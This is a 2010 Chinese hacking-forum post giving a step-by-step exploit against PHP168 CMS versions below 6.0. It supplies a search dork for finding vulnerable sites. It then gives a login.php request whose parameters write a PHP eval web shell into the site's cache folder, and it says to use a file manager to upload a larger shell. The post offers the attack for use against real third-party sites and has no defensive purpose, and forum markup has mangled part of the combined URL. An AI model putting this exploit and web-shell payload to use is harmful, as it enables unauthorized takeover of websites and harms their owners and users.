标题:
PHP168漏洞 Nday
[打印本页]
作者:
柔肠寸断
时间:
2010-1-9 15:47
标题:
PHP168漏洞 Nday
PHP168漏洞 Nday
1,适用于
PHP168 6.0以下版本
2,搜索关键字:Powered by php168 inurl:login.php
3,随便找一个试试:例如:
www.xxxxxxxxx.com/
login.php
4:在
www.xxxxxxxxx.com/
login.php
后面加上
?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=<[email=?php%20@eval($_POST[a]);?]?php%20@eval($_POST[a]);?[/email] >
即组成:[url=http://www.xxxxxxxxx.com/login.php?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=al($_POST[a[/email]
>
[/url]]);?
5,没有返回错误 那就继续
www.xxxxxxxxx.com/
cache/shell.php
就是一句话的地址 【<?php%20@eval($_POST[a]);?> 】
6,用
lanker微型PHP+ASP管理器1.0双用版 上传大马
作者:
林东东321
时间:
2010-3-14 15:50
提示:
作者被禁止或删除 内容自动屏蔽
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2